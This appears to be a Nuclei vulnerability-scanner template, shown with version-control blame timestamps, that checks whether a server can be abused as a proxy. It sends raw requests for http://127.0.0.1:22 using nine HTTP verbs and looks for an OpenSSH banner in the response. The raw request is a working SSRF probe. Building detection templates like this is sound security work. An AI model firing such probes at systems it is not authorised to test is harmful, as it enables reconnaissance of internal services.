2023-05-10 11:28:06 +00:00
|
|
|
id: ssrf-via-proxy
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: SSRF via Proxy Unsafe
|
|
|
|
author: geeknik,petergrifin
|
|
|
|
severity: unknown
|
|
|
|
reference:
|
|
|
|
- https://github.com/geeknik/the-nuclei-templates/blob/main/ssrf-by-proxy.yaml
|
|
|
|
- https://twitter.com/HusseiN98D/status/1649006265450782720
|
|
|
|
- https://twitter.com/ImoJOnDz/status/1649089777629827072
|
2023-06-03 18:56:35 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 9
|
2024-02-28 05:11:31 +00:00
|
|
|
tags: ssrf,proxy,oast,bruteforce
|
2023-05-10 11:28:06 +00:00
|
|
|
|
2023-05-11 09:17:44 +00:00
|
|
|
http:
|
2023-05-10 11:28:06 +00:00
|
|
|
- payloads:
|
|
|
|
verb:
|
|
|
|
- GET
|
|
|
|
- HEAD
|
|
|
|
- POST
|
|
|
|
- PUT
|
|
|
|
- DELETE
|
|
|
|
- CONNECT
|
|
|
|
- OPTIONS
|
|
|
|
- TRACE
|
|
|
|
- PATCH
|
|
|
|
raw:
|
|
|
|
- |+
|
|
|
|
{{verb}} http://127.0.0.1:22 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
|
|
|
unsafe: true
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2023-05-10 11:28:06 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "Protocol mismatch"
|
|
|
|
- "OpenSSH"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-02-28 07:36:01 +00:00
|
|
|
# digest: 490a0046304402206be4527be73a1a8aaf704109373b9377f5e8bb8392a592501c5058465df0471902200f9adedf455a7f7693921716076874158203e3a0e5406f09455f406e26aeca7a:922c64590222798bb761d5b6d8e72950
|